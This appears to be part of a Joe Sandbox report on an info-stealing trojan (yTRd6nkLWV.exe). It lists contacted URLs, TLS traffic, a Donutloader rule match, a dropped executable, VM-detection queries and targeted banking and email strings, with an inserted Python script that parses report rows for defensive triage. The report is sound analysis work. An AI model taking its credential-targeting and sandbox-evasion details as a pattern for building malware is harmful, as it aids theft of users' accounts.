Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist
Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/encrypted_folder_download/service_worker.js
Source: yTRd6nkLWV.exe, 00000001.00000002.1599818334.0000000000710000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1599889207.0000000000724000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597828981.0000000000725000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597828981.000000000070F000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp, 0A8O8L4RV6JWV8ND8.exe.1.dr | String found in binary or memory: https://www.dropbox.com/help
Source: yTRd6nkLWV.exe, 00000001.00000002.1599818334.0000000000710000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1599889207.0000000000724000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597828981.0000000000725000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597828981.000000000070F000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp, 0A8O8L4RV6JWV8ND8.exe.1.dr | String found in binary or memory: https://www.dropbox.com/home
Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/page_success/
Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/pithos/
Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/playlist/
Source: yTRd6nkLWV.exe, 00000001.00000002.1599483403.00000000006C6000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597973358.0000000000693000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/scl/fi/tzw461qf44namwoprtqi1/channels424_banner.jpg?rlkey=ggwr95slh92f24jnfj
Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/service_worker.js
Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/static/api/
Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/static/serviceworker/
Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/v/s/playlist/
Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.dropboxstatic.com/static/
Source: yTRd6nkLWV.exe, 00000001.00000003.1471466435.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1471310871.00000000033DC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
Source: yTRd6nkLWV.exe, 00000001.00000003.1471466435.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1471310871.00000000033DC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/
Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: yTRd6nkLWV.exe, 00000001.00000003.1558338882.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1528399384.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1473028075.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1598280172.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com/re
Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.hellofax.com/
Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.hellosign.com/
Source: yTRd6nkLWV.exe, 00000001.00000003.1502839435.000000000339A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: yTRd6nkLWV.exe, 00000001.00000003.1502333054.00000000036BA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: yTRd6nkLWV.exe, 00000001.00000003.1502333054.00000000036BA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: yTRd6nkLWV.exe, 00000001.00000003.1502333054.00000000036BA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: yTRd6nkLWV.exe, 00000001.00000003.1502333054.00000000036BA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: yTRd6nkLWV.exe, 00000001.00000003.1502333054.00000000036BA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.paypal.com/sdk/js
Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com
Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/
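Each entry above is one flattened table row: a "Source:" column listing the sample, the memory dumps (*.sdmp) and dropped files (*.dr) the string was found in, followed by the signature text and the URL. The following Python script is an added example, not part of the Joe Sandbox report and not Joe Sandbox's own tooling. It parses rows in this format (whether the two columns are fused as on this page or separated), extracts every URL host together with the sources it was found in, flags hosts that also appear inside a dropped file, and pairs the ephemeral client ports of the "Network traffic detected" rows with the "HTTPS traffic detected" rows so that a port without a server IP stands out. The sample rows embedded in the block are copied from this report; the function names and the use of the Windows default dynamic port range (49152 and up) to recognise client-side ports are my assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample input: a few rows copied from this report, both in the fused form
# seen on the page ("...sdmpString found...") and with an explicit " | " separator.
SAMPLE_LINES = [
    "Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn",
    "Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457509468.000000000067A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900",
    "Source: yTRd6nkLWV.exe, 00000001.00000003.1471466435.00000000033DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=",
    "Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp, 0A8O8L4RV6JWV8ND8.exe.1.drString found in binary or memory: https://www.dropbox.com/help",
    "Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784",
    "Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443",
    "Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49784 version: TLS 1.2",
]

# One report row: "Source: <sources>[ | ]<signature>: <value>". The separator is optional
# because extraction on this page fused the two columns ("...sdmpString found...").
ROW_RE = re.compile(
    r"^Source:\s*(?P<sources>.*?)\s*\|?\s*"
    r"(?P<kind>String found in binary or memory|Network traffic detected|HTTPS traffic detected):\s*"
    r"(?P<value>.*)$"
)
# Adjacent URLs are sometimes run together in one value ("...favicon.icohttps://...").
URL_RE = re.compile(r"https?://.*?(?=https?://|$)")
HTTPS_RE = re.compile(
    r"^(?P<sip>[\d.]+):(?P<sport>\d+) -> (?P<cip>[\d.]+):(?P<cport>\d+) version: (?P<ver>.+)$"
)
PORT_RE = re.compile(r"HTTP traffic on port (\d+) -> (\d+)")
EPHEMERAL_MIN = 49152  # assumption: Windows default dynamic (client) port range starts here


def parse_report_lines(lines):
    """Turn report rows into dicts with the signature kind, list of sources and raw value."""
    records = []
    for line in lines:
        m = ROW_RE.match(line.strip())
        if m:
            sources = [s.strip() for s in m["sources"].split(",") if s.strip()]
            records.append({"kind": m["kind"], "sources": sources, "value": m["value"].strip()})
    return records


def classify_source(src):
    """Joe Sandbox source naming: *.sdmp is a memory dump, *.dr a dropped file."""
    if src.endswith(".sdmp"):
        return "memory dump"
    if src.endswith(".dr"):
        return "dropped file"
    if src == "unknown":
        return "unknown"
    return "sample"


def hosts_by_source(records):
    """Map each URL host to the set of sources (dumps, dropped files, sample) it appeared in."""
    hosts = defaultdict(set)
    for r in records:
        if r["kind"] != "String found in binary or memory":
            continue
        for url in URL_RE.findall(r["value"]):
            host = urlsplit(url.rstrip(";")).hostname  # strip the CSP-style ';' suffix
            if host:
                hosts[host].update(r["sources"])
    return dict(hosts)


def hosts_in_dropped_files(records):
    """Hosts whose strings were found inside a dropped file, not only in process memory."""
    return {h for h, srcs in hosts_by_source(records).items()
            if any(classify_source(s) == "dropped file" for s in srcs)}


def client_port_map(records):
    """Client ephemeral port -> (server IP, server port, TLS version) from HTTPS rows."""
    ports = {}
    for r in records:
        if r["kind"] == "HTTPS traffic detected":
            m = HTTPS_RE.match(r["value"])
            if m:
                ports[int(m["cport"])] = (m["sip"], int(m["sport"]), m["ver"])
    return ports


def ports_without_tls_record(records):
    """Ephemeral ports from port rows that have no matching HTTPS row (server IP unknown)."""
    seen = set()
    for r in records:
        if r["kind"] == "Network traffic detected":
            m = PORT_RE.search(r["value"])
            if m:
                seen.update(p for p in map(int, m.groups()) if p >= EPHEMERAL_MIN)
    return seen - set(client_port_map(records))


if __name__ == "__main__":
    recs = parse_report_lines(SAMPLE_LINES)
    for host, srcs in sorted(hosts_by_source(recs).items()):
        print(host, sorted({classify_source(s) for s in srcs}))
    print("in dropped files:", sorted(hosts_in_dropped_files(recs)))
    print("client ports:", client_port_map(recs))
    print("ports lacking an HTTPS record:", sorted(ports_without_tls_record(recs)))
```

Feed it the whole report text instead of the sample to get a host list that carries its provenance: a host seen only in dumps that also hold Chrome search-engine defaults or Firefox new-tab assets is browser data the stealer read, while a host shared with a dropped file or with a TLS record points at something the sample itself fetched.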
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown | Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown | Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown | Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49784 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49795 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49801 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49812 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49825 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49838 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49849 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49860 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49876 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.7:49883 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.7:49897 version: TLS 1.2

              System Summary

              Source: 00000001.00000002.1600069921.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Code function: 1_3_006E4C8C
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Code function: 1_3_033A097B
              Source: yTRd6nkLWV.exe | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: yTRd6nkLWV.exe | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
              Source: yTRd6nkLWV.exe, 00000001.00000003.1429756057.0000000002A89000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameshfolder.dll~/ vs yTRd6nkLWV.exe
              Source: yTRd6nkLWV.exe, 00000001.00000000.1325188936.0000000000531000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameshfolder.dll~/ vs yTRd6nkLWV.exe
              Source: yTRd6nkLWV.exe | Binary or memory string: OriginalFilenameshfolder.dll~/ vs yTRd6nkLWV.exe
              Source: yTRd6nkLWV.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: 00000001.00000002.1600069921.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@2/2@12/4
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File created: C:\Users\user~1\AppData\Local\Temp\0A8O8L4RV6JWV8ND8.exe
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: yTRd6nkLWV.exe, 00000001.00000003.1472746878.00000000033A9000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1471958606.00000000033C7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: yTRd6nkLWV.exe | Virustotal: Detection: 8%
              Source: yTRd6nkLWV.exe | ReversingLabs: Detection: 36%
              Source: yTRd6nkLWV.exe | String found in binary or memory: -Helper process exited with failure code: 0x%x
              Source: yTRd6nkLWV.exe | String found in binary or memory: -HelperRegisterTypeLibrary: StatusCode invalidU
              Source: yTRd6nkLWV.exe | String found in binary or memory: /LoadInf=
              Source: yTRd6nkLWV.exe | String found in binary or memory: /InstallOnThisVersion: Invalid MinVersion string
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | File read: C:\Users\user\Desktop\yTRd6nkLWV.exe
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Section loaded: msimg32.dll
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Section loaded: version.dll
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Section loaded: mpr.dll
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Section loaded: wininet.dll
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Section loaded: mscoree.dll
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Section loaded: amsi.dll
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Section loaded: winhttp.dll
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Section loaded: webio.dll
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Section loaded: mswsock.dll
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Section loaded: winnsi.dll
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Section loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Section loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Section loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Section loaded: schannel.dll
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Section loaded: mskeyprotect.dll
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Section loaded: ntasn1.dll
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Section loaded: ncrypt.dll
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Section loaded: ncryptsslp.dll
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Section loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Section loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Section loaded: gpapi.dll
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Section loaded: dpapi.dll
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Section loaded: wbemcomn.dll
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Section loaded: profapi.dll
              Source: yTRd6nkLWV.exe | Static PE information: certificate valid
              Source: yTRd6nkLWV.exe | Static file information: File size 1625936 > 1048576
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Code function: 1_3_0067CA64 pushad ; retf 0067h | 1_3_0067CA65
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Code function: 1_3_0067CA60 pushad ; retf 0067h | 1_3_0067CA61
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Code function: 1_3_0067C268 push 680067C2h; retn 0067h | 1_3_0067C26D
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Code function: 1_3_0067CB68 push 680067CBh; retf | 1_3_0067CB6D
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Code function: 1_3_0067CB54 push eax; retf | 1_3_0067CB55
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Code function: 1_3_0067CA54 push esp; retf 0067h | 1_3_0067CA55
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Code function: 1_3_0067C254 push eax; retn 0067h | 1_3_0067C255
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Code function: 1_3_0067C250 push eax; retn 0067h | 1_3_0067C251
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Code function: 1_3_0067CB50 push eax; retf | 1_3_0067CB51
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Code function: 1_3_0067CA58 push esp; retf 0067h | 1_3_0067CA59
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Code function: 1_3_0068C2FC pushad ; ret | 1_3_0068C2FD
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Code function: 1_3_0067CAA0 pushfd ; retf 0067h | 1_3_0067CAA1
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Code function: 1_3_0067CA9C pushfd ; retf 0067h | 1_3_0067CA9D
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Code function: 1_3_006C0426 push esi; iretd | 1_3_006C0430
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Code function: 1_3_006C1519 pushad ; iretd | 1_3_006C17CD
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Code function: 1_3_006E324E push edi; retf | 1_3_006E3261
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Code function: 1_3_006E1643 push ebx; retf | 1_3_006E1661
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Code function: 1_3_006E5033 push 9701D786h; ret | 1_3_006E5041
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Code function: 1_3_006E1631 push edi; retf | 1_3_006E1641
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Code function: 1_3_006E37D6 push edi; iretd | 1_3_006E37D8
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Code function: 1_3_006EC490 push ecx; iretd | 1_3_006EC491
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Code function: 1_3_006B0062 pushad ; ret | 1_3_006B0063
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Code function: 1_3_006DE8E0 push esp; retf | 1_3_006DE8FA
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Code function: 1_3_006E00A3 push ss; retn 004Ah | 1_3_006E00A4
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | System information queried: FirmwareTableInformation
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe TID: 7680 | Thread sleep time: -300000s >= -30000s
              Source: C:\Users\user\Desktop\yTRd6nkLWV.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: Amcache.hve.1.dr | Binary or memory string: VMware
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696492231s
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696492231
              Source: Amcache.hve.1.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696492231
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1597973358.0000000000666000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696492231t
              Source: Amcache.hve.1.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696492231f
              Source: yTRd6nkLWV.exe, 00000001.00000003.1501934748.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1539997229.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1599483403.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWmr
              Source: Amcache.hve.1.dr | Binary or memory string: vmci.sys
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696492231
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
              Source: yTRd6nkLWV.exe, 00000001.00000003.1487064803.00000000033A6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696492231x
